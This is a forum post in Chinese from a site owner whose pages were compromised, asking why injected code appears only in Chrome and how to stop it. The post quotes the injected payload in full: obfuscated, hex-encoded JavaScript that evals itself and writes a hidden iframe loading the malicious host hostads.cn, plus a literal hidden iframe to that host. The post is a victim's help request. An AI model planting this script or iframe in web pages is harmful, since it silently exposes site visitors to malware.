我的网站似乎被黑了,或者发现了一个漏洞,所以现在每次我加载某些页面时,都会注入以下 javascript 和 iframe:
<script language="JavaScript" type="text/javascript">
B76197C940748B="pars";B76197C940748B+="eIn";B76197C940748B+="t";DCEC79103="St";DCEC79103+="ring.";DCEC79103+="fr";DCEC79103+="omC";DCEC79103+="harCo";DCEC79103+="de";function E0D7700E45C574E(A911795){var B3593798FBC66C=370;B3593798FBC66C=B3593798FBC66C-354;D086A805=eval(B76197C940748B+"(A911795,B3593798FBC66C)");return(D086A805);}function A41D3C153B9E8(E02A0){var D49C4143=940;D49C4143=D49C4143-938;var FB8E017784670AD="";for(E1709AB22C52CD=0;E1709AB22C52CD<E02A0.length;E1709AB22C52CD+=D49C4143){FB8E017784670AD+=( eval(DCEC79103+"(E0D7700E45C574E(E02A0.substr(E1709AB22C52CD,D49C4143)))"));}eval(FB8E017784670AD);}A41D3C153B9E8("69662028646F63756D656E742E636F6F6B69652E73656172636828227574626F3D382229203D3D202D3129207B0A7463707A3D646F63756D656E742E676574456C656D656E7442794964282771757A676327293B6966287463707A3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71757A6763207372633D687474703A2F2F686F73746164732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20227574626F3D383B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
</script>
<iframe id="quzgc" src="http://hostads.cn" style="display:none"></iframe>
我已经更新了我所有的密码(我的控制面板、数据库、ftp、......一切)并删除了我所有页面、php 文件、javascript 文件等上的恶意代码......我还修复了我所有的权限文件和文件夹到 755。(被感染的页面设置为 777)。
该问题在 Internet Explorer、Firefox、Opera 和 Safari 中似乎已解决。那里一切正常,不再插入任何恶意代码。然而,当我用谷歌浏览器浏览我的网站时,我得到著名的“警告:检测到恶意软件”页面,告诉我谷歌发现了“hostads.cn”的内容,这是一个已知的恶意网站。然后,当我查看源代码时,我确实可以在我的代码中看到某些 javascript 和 iframe。
我尝试调试我的网站,逐步检查代码以检查可能注入代码的位置或内容,但我真的找不到任何东西。所有其他浏览器似乎也没有受到影响。
另一个奇怪的地方:当我“让”我的页面被感染时:即:我忽略了来自 Chrome 的警告并继续访问该网页,我确实可以在我的源代码中看到恶意代码。但是当我用 FTP 下载某个页面时,一切看起来都很好......
那么为什么这个恶意代码是单独插入谷歌浏览器的,而不是持久的呢?更重要的是:我能做些什么来对抗它?
谢谢。